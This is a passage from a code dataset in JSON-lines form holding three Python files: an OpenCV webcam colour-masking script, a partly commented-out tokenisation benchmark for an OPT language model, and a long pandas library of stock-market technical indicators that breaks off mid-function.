{"api_name": "os.makedirs", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}]}
+{"seq_id": "74285446247", "text": "import cv2 \nimport numpy as np \n\nminRed1 = np.array([90, 100, 100]) \nmaxRed1 = np.array([135, 255, 255]) \n\nminRed2 = np.array([0, 100, 250])\nmaxRed2 = np.array([0, 255, 255])\n\ncap = cv2.VideoCapture(0)\n\nwhile True:\n ret, frame = cap.read() \n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) \n\n red_only1 = cv2.bitwise_and(frame, frame, mask=cv2.inRange(hsv, minRed1, maxRed1)) \n red_only2 = cv2.bitwise_and(frame, frame, mask=cv2.inRange(hsv, minRed2, maxRed2)) \n\n result = cv2.addWeighted(red_only1, 1, red_only2, 1, 1)\n cv2.imshow('window', frame) \n cv2.imshow('window2', result) \n\n if cv2.waitKey(1) & 0xFF == ord('q'): \n break \n\ncap.release() \ncv2.destroyAllWindows()\n\n", "repo_name": "Null-Delta/ADMP", "sub_path": "LR2/task2.py", "file_name": "task2.py", "file_ext": "py", "file_size_in_byte": 701, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 14, "usage_type": "attribute"}, {"api_name": "cv2.bitwise_and", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 27, "usage_type": "call"}]}
+{"seq_id": "21583851226", "text": "import torch\nfrom transformers import AutoTokenizer, AutoModelForTokenClassification, pipeline, AutoModelForCausalLM\nfrom transformers import pipeline\nfrom deepspeed.module_inject import HFBertLayerPolicy\nimport deepspeed\nimport tqdm\nfrom datasets import load_dataset\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\ndataset = load_dataset(\"ChaiML/user_model_inputs\")\n# Model Repository on huggingface.co\nmodel_id = \"KoboldAI/OPT-6B-nerys-v2\"\n# model_id = \"gpt2\"\n\nstats = {}\n\n# load model and tokenizer\ntry:\n tokenizer = AutoTokenizer.from_pretrained(model_id, use_fast=True)\nexcept:\n tokenizer = AutoTokenizer.from_pretrained(model_id, use_fast=False)\n\n# Test pipeline\nGENERATION_KWARGS = {\n \"max_new_tokens\": 32,\n # \"min_new_tokens\": 8,\n 'eos_token_id': 198,\n 'do_sample': True,\n 'pad_token_id': 198,\n 'temperature': 0.72,\n 'top_k': 0,\n 'top_p': 0.725,\n 'repetition_penalty': 1.13,\n}\n\nINPUT_EXAMPLES = dataset[\"train\"][\"text\"][:100]\n\nexample = INPUT_EXAMPLES[0]\n\nimport os\nfrom optimum.onnxruntime import ORTModelForCausalLM\nfrom transformers import AutoTokenizer, pipeline\n\nmodel_checkpoint = \"KoboldAI/OPT-6B-nerys-v2\"\nsave_directory = \"onnx/\"\nfile_name = \"model.onnx\"\nonnx_path = os.path.join(save_directory, \"model.onnx\")\n\n# Load a model from transformers and export it through the ONNX format\n# model = ORTModelForCausalLM.from_pretrained(model_checkpoint, from_transformers=True).to(0)\n\nmax_batch_size = 1\nfor i in range(1, 5):\n try:\n inputs = tokenizer([example] * i, return_tensors='pt').to(0)\n # result = model.generate(**inputs, **GENERATION_KWARGS)\n print(f\"Batch size: {i}\")\n max_batch_size = i\n except Exception as ex:\n print(ex)\n break\n\n# torch_pipe = pipeline(\"text-generation\", model=model, tokenizer=tokenizer, device=0)\nprint(\"ONNX single batch\")\ntorch_outputs = []\nfor example in tqdm.tqdm(INPUT_EXAMPLES[:20], desc=\"ONNX single batch\"):\n inputs = tokenizer(example, return_tensors='pt').to(0)\n # result = model.generate(**inputs, **GENERATION_KWARGS)\n # torch_output = torch_pipe(example, **GENERATION_KWARGS)[0][\"generated_text\"][len(example):]\n # torch_outputs.append(torch_output)\nprint(\"ONNX batch size\")\ntorch_outputs = []\ntry:\n for example in tqdm.tqdm(INPUT_EXAMPLES[:10], desc=\"ONNX batch size\"):\n inputs = tokenizer([example] * max_batch_size, return_tensors='pt').to(0)\n # result = model.generate(**inputs, **GENERATION_KWARGS)\nexcept Exception as ex:\n print(ex)\n", "repo_name": "AlekseyKorshuk/xla-clm", "sub_path": "onnx/bert.py", "file_name": "bert.py", "file_ext": "py", "file_size_in_byte": 2510, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "warnings.filterwarnings", "line_number": 10, "usage_type": "call"}, {"api_name": "datasets.load_dataset", "line_number": 11, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 20, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 20, "usage_type": "name"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 22, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 22, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 67, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 75, "usage_type": "call"}]}
+{"seq_id": "24315675344", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# https://www.quantopian.com/posts/technical-analysis-indicators-without-talib-code\n# https://github.com/FreddieWitherden/ta/blob/master/ta.py\n\nimport pandas as pd\nimport numpy as np\n\n#Moving Average\ndef MA(df, n):\n MA = pd.Series(pd.rolling_mean(df['close'], n), name = 'MA_' + str(n))\n return MA\n\n#Exponential Moving Average\ndef EMA(df, n):\n EMA = pd.Series(df['close'].ewm(span = n, min_periods = int(n - 1)).mean(), name = 'EMA_' + str(n))\n return EMA\n\n#Momentum\ndef MOM(df, n):\n M = pd.Series(df['close'].diff(n), name = 'Momentum_' + str(n))\n return M\n\n#Rate of Change\ndef ROC(df, n):\n M = df['close'].diff(n - 1)\n N = df['close'].shift(n - 1)\n ROC = pd.Series(M / N, name = 'ROC_' + str(n))\n return ROC\n\n#Average True Range\ndef ATR(df, n):\n i = 0\n TR_l = [0]\n while i < df.index[-1]:\n TR = max(df.ix[i + 1, 'high'], df.ix[i, 'close']) - min(df.ix[i + 1, 'low'], df.ix[i, 'close'])\n TR_l.append(TR)\n i = i + 1\n TR_s = pd.Series(TR_l)\n ATR = pd.Series(TR_s.ewm(span = n, min_periods = int(n)).mean(), name = 'ATR_' + str(n))\n return ATR\n\n#Bollinger Bands\ndef BBANDS(df, n):\n MA = pd.Series(pd.rolling_mean(df['close'], n))\n MSD = pd.Series(pd.rolling_std(df['close'], n))\n b1 = 4 * MSD / MA\n B1 = pd.Series(b1, name = 'BollingerB_' + str(n))\n b2 = (df['close'] - MA + 2 * MSD) / (4 * MSD)\n B2 = pd.Series(b2, name = 'Bollinger%b_' + str(n))\n return B1, B2\n\n#Pivot Points, Supports and Resistances\ndef PPSR(df):\n PP = pd.Series((df['high'] + df['low'] + df['close']) / 3)\n R1 = pd.Series(2 * PP - df['low'])\n S1 = pd.Series(2 * PP - df['high'])\n R2 = pd.Series(PP + df['high'] - df['low'])\n S2 = pd.Series(PP - df['high'] + df['low'])\n R3 = pd.Series(df['high'] + 2 * (PP - df['low']))\n S3 = pd.Series(df['low'] - 2 * (df['high'] - PP))\n psr = {'PP':PP, 'R1':R1, 'S1':S1, 'R2':R2, 'S2':S2, 'R3':R3, 'S3':S3}\n PSR = pd.DataFrame(psr)\n return PSR\n\n#Stochastic oscillator %K\ndef STOK(df):\n SOk = pd.Series((df['close'] - df['low']) / (df['high'] - df['low']), name = 'SO%k')\n return SOk\n\n#Stochastic oscillator %D\ndef STO(df, n):\n SOk = pd.Series((df['close'] - df['low']) / (df['high'] - df['low']), name = 'SO%k')\n SOd = pd.Series(SOk.ewm(span = n, min_periods = int(n - 1)).mean(), name = 'SO%d_' + str(n))\n return SOd\n\n#Trix\ndef TRIX(df, n):\n EX1 = df['close'].ewm(span = n, min_periods = int(n - 1)).mean()\n EX2 = EX1.ewm(span = n, min_periods = int(n - 1)).mean()\n EX3 = EX2.ewm(span = n, min_periods = int(n - 1)).mean()\n i = 0\n ROC_l = [0]\n while i + 1 <= df.index[-1]:\n ROC = (EX3[i + 1] - EX3[i]) / EX3[i]\n ROC_l.append(ROC)\n i = i + 1\n Trix = pd.Series(ROC_l, name = 'Trix_' + str(n))\n return Trix\n\n#Average Directional Movement Index\ndef ADX(df, n, n_ADX):\n i = 0\n UpI = []\n DoI = []\n while i + 1 <= df.index[-1]:\n UpMove = df.ix[i + 1, 'high'] - df.ix[i, 'high']\n DoMove = df.ix[i, 'low'] - df.ix[i + 1, 'low']\n if UpMove > DoMove and UpMove > 0:\n UpD = UpMove\n else: UpD = 0\n UpI.append(UpD)\n if DoMove > UpMove and DoMove > 0:\n DoD = DoMove\n else: DoD = 0\n DoI.append(DoD)\n i = i + 1\n i = 0\n TR_l = [0]\n while i < df.index[-1]:\n TR = max(df.ix[i + 1, 'high'], df.ix[i, 'close']) - min(df.ix[i + 1, 'low'], df.ix[i, 'close'])\n TR_l.append(TR)\n i = i + 1\n TR_s = pd.Series(TR_l)\n ATR = pd.Series(TR_s.ewm(span = n, min_periods = int(n)).mean())\n UpI = pd.Series(UpI)\n DoI = pd.Series(DoI)\n PosDI = pd.Series(UpI.ewm(span = n, min_periods = int(n - 1) / ATR).mean())\n NegDI = pd.Series(DoI.ewm(span = n, min_periods = int(n - 1) / ATR).mean())\n ADX = pd.Series((abs(PosDI - NegDI) / (PosDI + NegDI)).ewm(span = n_ADX, min_periods = int(n_ADX - 1)).mean(), name = 'ADX_' + str(n) + '_' + str(n_ADX))\n return ADX\n\n#DEMA\ndef DEMA(df, n_fast, n_slow, signal=9):\n EMAfast = pd.Series(df['close'].ewm(span = n_fast, min_periods = int(n_slow - 1)).mean())\n EMAslow = pd.Series(df['close'].ewm(span = n_slow, min_periods = int(n_slow - 1)).mean())\n DEMA = pd.Series(100 * (EMAfast- EMAslow) / ((EMAfast + EMAslow) / 2), name = 'DEMA_' + str(n_fast) + '_' + str(n_slow))\n return DEMA\n\n#MACD, MACD Signal and MACD difference\ndef MACD(df, n_fast, n_slow, signal=9):\n EMAfast = pd.Series(df['close'].ewm(span = n_fast, min_periods = int(n_slow - 1)).mean())\n EMAslow = pd.Series(df['close'].ewm(span = n_slow, min_periods = int(n_slow - 1)).mean())\n MACD = pd.Series(EMAfast - EMAslow, name = 'MACD_' + str(n_fast) + '_' + str(n_slow))\n MACDsign = pd.Series(MACD.ewm(span = signal, min_periods = int(signal)).mean(), name = 'MACDsign_' + str(n_fast) + '_' + str(n_slow))\n MACDdiff = pd.Series(MACD - MACDsign, name = 'MACDdiff_' + str(n_fast) + '_' + str(n_slow))\n return MACD, MACDsign, MACDdiff\n\n#PPO, PPO Signal and PPO difference\ndef PPO(df, n_fast, n_slow, signal=9):\n EMAfast = pd.Series(df['close'].ewm(span = n_fast, min_periods = int(n_slow - 1)).mean())\n EMAslow = pd.Series(df['close'].ewm(span = n_slow, min_periods = int(n_slow - 1)).mean())\n PPO = pd.Series(100 * (EMAfast - EMAslow) / EMAslow, name = 'PPO_' + str(n_fast) + '_' + str(n_slow))\n PPOsign = pd.Series(PPO.ewm(span = signal, min_periods = int(signal)).mean(), name = 'PPOsign_' + str(n_fast) + '_' + str(n_slow))\n PPOdiff = pd.Series(PPO - PPOsign, name = 'PPOdiff_' + str(n_fast) + '_' + str(n_slow))\n return PPO, PPOsign, PPOdiff\n\n#Mass Index\ndef MassI(df):\n Range = df['high'] - df['low']\n EX1 = Range.ewm(span = 9, min_periods = 8).mean()\n EX2 = EX1.ewm(span = 9, min_periods = 8).mean()\n Mass = EX1 / EX2\n MassI = pd.Series(pd.rolling_sum(Mass, 25), name = 'Mass Index')\n return MassI\n\n#Vortex Indicator: http://www.vortexindicator.com/VFX_VORTEX.PDF\ndef Vortex(df, n):\n i = 0\n TR = [0]\n while i < df.index[-1]:\n Range = max(df.ix[i + 1, 'high'], df.ix[i, 'close']) - min(df.ix[i + 1, 'low'], df.ix[i, 'close'])\n TR.append(Range)\n i = i + 1\n i = 0\n VM = [0]\n while i < df.index[-1]:\n Range = abs(df.ix[i + 1, 'high'] - df.ix[i, 'low']) - abs(df.ix[i + 1, 'low'] - df.ix[i, 'high'])\n VM.append(Range)\n i = i + 1\n VI = pd.Series(pd.rolling_sum(pd.Series(VM), n) / pd.rolling_sum(pd.Series(TR), n), name = 'Vortex_' + str(n))\n return VI\n\n\n\n\n\n#KST Oscillator\ndef KST(df, r1, r2, r3, r4, n1, n2, n3, n4):\n M = df['close'].diff(r1 - 1)\n N = df['close'].shift(r1 - 1)\n ROC1 = M / N\n M = df['close'].diff(r2 - 1)\n N = df['close'].shift(r2 - 1)\n ROC2 = M / N\n M = df['close'].diff(r3 - 1)\n N = df['close'].shift(r3 - 1)\n ROC3 = M / N\n M = df['close'].diff(r4 - 1)\n N = df['close'].shift(r4 - 1)\n ROC4 = M / N\n KST = pd.Series(pd.rolling_sum(ROC1, n1) + pd.rolling_sum(ROC2, n2) * 2 + pd.rolling_sum(ROC3, n3) * 3 + pd.rolling_sum(ROC4, n4) * 4, name = 'KST_' + str(r1) + '_' + str(r2) + '_' + str(r3) + '_' + str(r4) + '_' + str(n1) + '_' + str(n2) + '_' + str(n3) + '_' + str(n4))\n return KST\n\n#Relative Strength Index\ndef RSI(df, n):\n UpMove = df['high'].diff(-1)\n DoMove = df['low'].diff(1)\n UpMove[UpMove <= DoMove] = 0\n DoMove[DoMove <= UpMove] = 0\n UpMove[UpMove < 0] = 0\n DoMove[DoMove < 0] = 0\n UpMove = pd.Series(UpMove)\n DoMove = pd.Series(DoMove)\n PosDI = pd.Series(UpMove.ewm(span = n, min_periods = int(n - 1)).mean())\n NegDI = pd.Series(DoMove.ewm(span = n, min_periods = int(n - 1)).mean())\n RSI = pd.Series(PosDI / (PosDI + NegDI), name = 'RSI_' + str(n))\n return RSI\n\n#Relative Strength Index\ndef RSI_(df, n):\n i = 0\n UpI = [0]\n DoI = [0]\n while i + 1 < df.shape[0]:\n UpMove = df.ix[i + 1, 'high'] - df.ix[i, 'high']\n DoMove = df.ix[i, 'low'] - df.ix[i + 1, 'low']\n if UpMove > DoMove and UpMove > 0:\n UpD = UpMove\n else: UpD = 0\n UpI.append(UpD)\n if DoMove > UpMove and DoMove > 0:\n DoD = DoMove\n else: DoD = 0\n DoI.append(DoD)\n i = i + 1\n UpI = pd.Series(UpI)\n DoI = pd.Series(DoI)\n PosDI = pd.Series(UpI.ewm(span = n, min_periods = int(n - 1)).mean())\n NegDI = pd.Series(DoI.ewm(span = n, min_periods = int(n - 1)).mean())\n RSI = pd.Series(PosDI / (PosDI + NegDI), name = 'RSI_' + str(n))\n return RSI\n\n#Relative Strength Index\ndef _RSI(df, n):\n nint = int(n)\n deltas = df[\"close\"].diff()\n seed = deltas[:nint+1]\n up = seed[seed>=0].sum()/n\n down = -seed[seed<0].sum()/n\n rs = up/down\n rsi = np.zeros((df.shape[0],), dtype=np.float64)\n rsi[:nint] = 100. - 100./(1.+rs)\n\n for i in range(nint, len(deltas)):\n delta = deltas[i-1] # cause the diff is 1 shorter\n\n if delta>0:\n upval = delta\n downval = 0.\n else:\n upval = 0.\n downval = -delta\n\n up = (up*(n-1) + upval)/n\n down = (down*(n-1) + downval)/n\n\n rs = up/down\n rsi[i] = 100. - 100./(1.+rs)\n RSI = pd.Series(rsi, name = 'RSI_' + str(n))\n return RSI\n\n# Stochastic Relative Strength Index\ndef STOCHRSI(df, n):\n start = -int(n)\n if start < 0:\n start = 0\n rsi = RSI(df, n)\n RSIhistory = rsi[start:]\n minRSI = RSIhistory.min()\n maxRSI = RSIhistory.max()\n base = maxRSI - minRSI\n if base == 0:\n base = -minRSI\n STOCHRSI = pd.Series(((rsi - minRSI) / base), name = 'STOCHRSI_' + str(n))\n return STOCHRSI\n\n#True Strength Index\ndef TSI(df, r, s):\n M = pd.Series(df['close'].diff(1))\n aM = abs(M)\n EMA1 = pd.Series(M.ewm(span = r, min_periods = int(r - 1)).mean())\n aEMA1 = pd.Series(aM.ewm(span = r, min_periods = int(r - 1)).mean())\n EMA2 = pd.Series(EMA1.ewm(span = s, min_periods = int(s - 1)).mean())\n aEMA2 = pd.Series(aEMA1.ewm(span = s, min_periods = int(s - 1)).mean())\n TSI = pd.Series(EMA2 / aEMA2, name = 'TSI_' + str(r) + '_' + str(s))\n return TSI\n\n#Accumulation/Distribution\ndef ACCDIST(df, n):\n ad = (2 * df['close'] - df['high'] - df['low']) / (df['high'] - df['low']) * df['volume']\n M = ad.diff(n - 1)\n N = ad.shift(n - 1)\n ROC = M / N\n AD = pd.Series(ROC, name = 'Acc/Dist_ROC_' + str(n))\n return AD\n\n#Chaikin Oscillator\ndef Chaikin(df):\n ad = (2 * df['close'] - df['high'] - df['low']) / (df['high'] - df['low']) * df['volume']\n Chaikin = pd.Series(ad.ewm(span = 3, min_periods = 2).mean() - ad.ewm(span = 10, min_periods = 9).mean(), name = 'Chaikin')\n return Chaikin\n\n#Money Flow Index and Ratio\ndef MFI(df, n):\n PP = (df['high'] + df['low'] + df['close']) / 3\n i = 0\n PosMF = [0]\n while i < df.index[-1]:\n if PP[i + 1] > PP[i]:\n PosMF.append(PP[i + 1] * df.ix[i + 1, 'volume'])\n else:\n PosMF.append(0)\n i = i + 1\n PosMF = pd.Series(PosMF)\n TotMF = PP * df['volume']\n MFR = pd.Series(PosMF / TotMF)\n MFI = pd.Series(pd.rolling_mean(MFR, n), name = 'MFI_' + str(n))\n return MFI\n\n#On-balance Volume\ndef OBV(df, n):\n i = 0\n OBV = [0]\n while i < df.index[-1]:\n if df.ix[i + 1, 'close'] - df.ix[i, 'close'] > 0:\n OBV.append(df.ix[i + 1, 'volume'])\n if df.ix[i + 1, 'close'] - df.ix[i, 'close'] == 0:\n OBV.append(0)\n if df.ix[i + 1, 'close'] - df.ix[i, 'close'] < 0:\n OBV.append(-df.ix[i + 1, 'volume'])\n i = i + 1\n OBV = pd.Series(OBV)\n OBV_ma = pd.Series(pd.rolling_mean(OBV, n), name = 'OBV_' + str(n))\n return OBV_ma\n\n#Force Index\ndef FORCE(df, n):\n F = pd.Series(df['close'].diff(n) * df['volume'].diff(n), name = 'Force_' + str(n))\n return F\n\n#Ease of Movement\ndef EOM(df, n):\n EoM = (df['high'].diff(1) + df['low'].diff(1)) * (df['high'] - df['low']) / (2 * df['volume'])\n Eom_ma = pd.Series(pd.rolling_mean(EoM, n), name = 'EoM_' + str(n))\n return Eom_ma\n\n#Commodity Channel Index\ndef CCI(df, n):\n PP = (df['high'] + df['low'] + df['close']) / 3\n CCI = pd.Series((PP - pd.rolling_mean(PP, n)) / pd.rolling_std(PP, n), name = 'CCI_' + str(n))\n return CCI\n\n#Coppock Curve\ndef COPP(df, n):\n M = df['close'].diff(int(n * 11 / 10) - 1)\n N = df['close'].shift(int(n * 11 / 10) - 1)\n ROC1 = M / N\n M = df['close'].diff(int(n * 14 / 10) - 1)\n N = df['close'].shift(int(n * 14 / 10) - 1)\n ROC2 = M / N\n Copp = pd.Series((ROC1 + ROC2).ewm(span = n, min_periods = int(n)).mean(), name = 'Copp_' + str(n))\n return Copp\n\n#Keltner Channel\ndef KELCH(df, n):\n KelChM = pd.Series(pd.rolling_mean((df['high'] + df['low'] + df['close']) / 3, n), name = 'KelChM_' + str(n))\n KelChU = pd.Series(pd.rolling_mean((4 * df['high'] - 2 * df['low'] + df['close']) / 3, n), name = 'KelChU_' + str(n))\n KelChD = pd.Series(pd.rolling_mean((-2 * df['high'] + 4 * df['low'] + df['close']) / 3, n), name = 'KelChD_' + str(n))\n return KelChM, KelChU, KelChD\n\n#Ultimate Oscillator\ndef ULTOSC(df):\n i = 0\n TR_l = [0]\n BP_l = [0]\n while i < df.index[-1]:\n TR = max(df.ix[i + 1, 'high'], df.ix[i, 'close']) - min(df.ix[i + 1, 'low'], df.ix[i, 'close'])\n TR_l.append(TR)\n BP = df.ix[i + 1, 'close'] - min(df.ix[i + 1, 'low'], df.ix[i, 'close'])\n BP_l.append(BP)\n i = i + 1\n UltO = pd.Series((4 * pd.rolling_sum(pd.Series(BP_l), 7) / pd.rolling_sum(pd.Series(TR_l), 7)) + (2 * pd.rolling_sum(pd.Series(BP_l), 14) / pd.rolling_sum(pd.Series(TR_l), 14)) + (pd.rolling_sum(pd.Series(BP_l), 28) / pd.rolling_sum(pd.Series(TR_l), 28)), name = 'Ultimate_Osc')\n return UltO\n\n#Donchian Channel\ndef DONCH(df, n):\n i = 0\n DC_l = []\n while i < n - 1:\n DC_l.append(0)\n i = i + 1\n i = 0\n while i + n - 1 < df.index[-1]:\n DC = max(df['high'].ix[i:i + n - 1]) - min(df['low'].ix[i:i + n - 1])\n DC_l.append(DC)\n i = i + 1\n DonCh = pd.Series(DC_l, name = 'Donchian_' + str(n))\n DonCh = DonCh.shift(n - 1)\n return DonCh\n\n#Standard Deviation\ndef STDDEV(df, n):\n return pd.Series(pd.rolling_std(df['close'], n), name = 'STD_' + str(n))\n\n\n\n\nfrom functools import wraps\n\nfrom pandas import DataFrame, Series\nfrom pandas.stats import moments\n\n\ndef series_indicator(col):\n def inner_series_indicator(f):\n @wraps(f)\n def wrapper(s, *args, **kwargs):\n if isinstance(s, DataFrame):\n s = s[col]\n return f(s, *args, **kwargs)\n return wrapper\n return inner_series_indicator\n\n\ndef _wilder_sum(s, n):\n s = s.dropna()\n\n nf = (n - 1) / n\n ws = [np.nan]*(n - 1) + [s[n - 1] + nf*sum(s[:n - 1])]\n\n for v in s[n:]:\n ws.append(v + ws[-1]*nf)\n\n return Series(ws, index=s.index)\n\n\n@series_indicator('high')\ndef hhv(s, n):\n return moments.rolling_max(s, n)\n\n\n@series_indicator('low')\ndef llv(s, n):\n return moments.rolling_min(s, n)\n\n\n@series_indicator('close')\ndef ema(s, n, wilder=False):\n span = n if not wilder else 2*n - 1\n return moments.ewma(s, span=span)\n\n\n@series_indicator('close')\ndef macd(s, nfast=12, nslow=26, nsig=9, percent=True):\n fast, slow = ema(s, nfast), ema(s, nslow)\n\n if percent:\n macd = 100*(fast / slow - 1)\n else:\n macd = fast - slow\n\n sig = ema(macd, nsig)\n hist = macd - sig\n\n return DataFrame(dict(macd=macd, signal=sig, hist=hist,\n fast=fast, slow=slow))\n\n\ndef aroon(s, n=25):\n up = 100 * moments.rolling_apply(s.high, n + 1, lambda x: x.argmax()) / n\n dn = 100 * moments.rolling_apply(s.low, n + 1, lambda x: x.argmin()) / n\n\n return DataFrame(dict(up=up, down=dn))\n\n\n@series_indicator('close')\ndef rsi(s, n=14):\n diff = s.diff()\n which_dn = diff < 0\n\n up, dn = diff, diff*0\n up[which_dn], dn[which_dn] = 0, -up[which_dn]\n\n emaup = ema(up, n, wilder=True)\n emadn = ema(dn, n, wilder=True)\n\n return 100 * emaup/(emaup + emadn)\n\n\ndef stoch(s, nfastk=14, nfullk=3, nfulld=3):\n if not isinstance(s, DataFrame):\n s = DataFrame(dict(high=s, low=s, close=s))\n\n hmax, lmin = hhv(s, nfastk), llv(s, nfastk)\n\n fastk = 100 * (s.close - lmin)/(hmax - lmin)\n fullk = moments.rolling_mean(fastk, nfullk)\n fulld = moments.rolling_mean(fullk, nfulld)\n\n return DataFrame(dict(fastk=fastk, fullk=fullk, fulld=fulld))\n\n\n@series_indicator('close')\ndef dtosc(s, nrsi=13, nfastk=8, nfullk=5, nfulld=3):\n srsi = stoch(rsi(s, nrsi), nfastk, nfullk, nfulld)\n return DataFrame(dict(fast=srsi.fullk, slow=srsi.fulld))\n\n\ndef atr(s, n=14):\n cs = s.close.shift(1)\n tr = s.high.combine(cs, max) - s.low.combine(cs, min)\n\n return ema(tr, n, wilder=True)\n\n\ndef cci(s, n=20, c=0.015):\n if isinstance(s, DataFrame):\n s = s[['high', 'low', 'close']].mean(axis=1)\n\n mavg = moments.rolling_mean(s, n)\n mdev = moments.rolling_apply(s, n, lambda x: np.fabs(x - x.mean()).mean())\n\n return (s - mavg)/(c * mdev)\n\n\ndef cmf(s, n=20):\n clv = (2*s.close - s.high - s.low) / (s.high - s.low)\n vol = s.volume\n\n return moments.rolling_sum(clv*vol, n) / moments.rolling_sum(vol, n)\n\n\ndef force(s, n=2):\n return ema(s.close.diff()*s.volume, n)\n\n\n@series_indicator('close')\ndef kst(s, r1=10, r2=15, r3=20, r4=30, n1=10, n2=10, n3=10, n4=15, nsig=9):\n rocma1 = moments.rolling_mean(s / s.shift(r1) - 1, n1)\n rocma2 = moments.rolling_mean(s / s.shift(r2) - 1, n2)\n rocma3 = moments.rolling_mean(s / s.shift(r3) - 1, n3)\n rocma4 = moments.rolling_mean(s / s.shift(r4) - 1, n4)\n\n kst = 100*(rocma1 + 2*rocma2 + 3*rocma3 + 4*rocma4)\n sig = moments.rolling_mean(kst, nsig)\n\n return DataFrame(dict(kst=kst, signal=sig))\n\n\ndef ichimoku(s, n1=9, n2=26, n3=52):\n conv = (hhv(s, n1) + llv(s, n1)) / 2\n base = (hhv(s, n2) + llv(s, n2)) / 2\n\n spana = (conv + base) / 2\n spanb = (hhv(s, n3) + llv(s, n3)) / 2\n\n return DataFrame(dict(conv=conv, base=base, spana=spana.shift(n2),\n spanb=spanb.shift(n2), lspan=s.close.shift(-n2)))\n\n\ndef ultimate(s, n1=7, n2=14, n3=28):\n cs = s.close.shift(1)\n bp = s.close - s.low.combine(cs, min)\n tr = s.high.combine(cs, max) - s.low.combine(cs, min)\n\n avg1 = moments.rolling_sum(bp, n1) / moments.rolling_sum(tr, n1)\n avg2 = moments.rolling_sum(bp, n2) / moments.rolling_sum(tr, n2)\n avg3 = moments.rolling_sum(bp, n3) / moments.rolling_sum(tr, n3)\n\n return 100*(4*avg1 + 2*avg2 + avg3) / 7\n\n\ndef auto_envelope(s, nema=22, nsmooth=100, ndev=2.7):\n sema = ema(s.close, nema)\n mdiff = s[['high','low']].sub(sema, axis=0).abs().max(axis=1)\n csize = moments.ewmstd(mdiff, nsmooth)*ndev\n\n return DataFrame(dict(ema=sema, lenv=sema - csize, henv=sema + csize))\n\n\n@series_indicator('close')\ndef bbands(s, n=20, ndev=2):\n mavg = moments.rolling_mean(s, n)\n mstd = moments.rolling_std(s, n)\n\n hband = mavg + ndev*mstd\n lband = mavg - ndev*mstd\n\n return DataFrame(dict(ma=mavg, lband=lband, hband=hband))\n\n\ndef safezone(s, position, nmean=10, npen=2.0, nagg=3):\n if isinstance(s, DataFrame):\n s = s.low if position == 'long' else s.high\n\n sgn = -1.0 if position == 'long' else 1.0\n\n # Compute the average upside/downside penetration\n pen = moments.rolling_apply(\n sgn*s.diff(), nmean,\n lambda x: x[x > 0].mean() if (x > 0).any() else 0\n )\n\n stop = s + sgn*npen*pen\n return hhv(stop, nagg) if position == 'long' else llv(stop, nagg)\n\n\ndef sar(s, af=0.02, amax=0.2):\n high, low = s.high, s.low\n\n # Starting values\n sig0, xpt0, af0 = True, high[0], af\n sar = [low[0] - (high - low).std()]\n\n for i in xrange(1, len(s)):\n sig1, xpt1, af1 = sig0, xpt0, af0\n\n lmin = min(low[i - 1], low[i])\n lmax = max(high[i - 1], high[i])\n\n if sig1:\n sig0 = low[i] > sar[-1]\n xpt0 = max(lmax, xpt1)\n else:\n sig0 = high[i] >= sar[-1]\n xpt0 = min(lmin, xpt1)\n\n if sig0 == sig1:\n sari = sar[-1] + (xpt1 - sar[-1])*af1\n af0 = min(amax, af1 + af)\n\n if sig0:\n af0 = af0 if xpt0 > xpt1 else af1\n sari = min(sari, lmin)\n else:\n af0 = af0 if xpt0 < xpt1 else af1\n sari = max(sari, lmax)\n else:\n af0 = af\n sari = xpt0\n\n sar.append(sari)\n\n return Series(sar, index=s.index)\n\n\ndef adx(s, n=14):\n cs = s.close.shift(1)\n tr = s.high.combine(cs, max) - s.low.combine(cs, min)\n trs = _wilder_sum(tr, n)\n\n up = s.high - s.high.shift(1)\n dn = s.low.shift(1) - s.low\n\n pos = ((up > dn) & (up > 0)) * up\n neg = ((dn > up) & (dn > 0)) * dn\n\n dip = 100 * _wilder_sum(pos, n) / trs\n din = 100 * _wilder_sum(neg, n) / trs\n\n dx = 100 * np.abs((dip - din)/(dip + din))\n adx = ema(dx, n, wilder=True)\n\n return DataFrame(dict(adx=adx, dip=dip, din=din))\n\n\ndef chandelier(s, position, n=22, npen=3):\n if position == 'long':\n return hhv(s, n) - npen*atr(s, n)\n else:\n return llv(s, n) + npen*atr(s, n)\n\n\ndef vortex(s, n=14):\n ss = s.shift(1)\n\n tr = s.high.combine(ss.close, max) - s.low.combine(ss.close, min)\n trn = moments.rolling_sum(tr, n)\n\n vmp = np.abs(s.high - ss.low)\n vmm = np.abs(s.low - ss.high)\n\n vip = moments.rolling_sum(vmp, n) / trn\n vin = 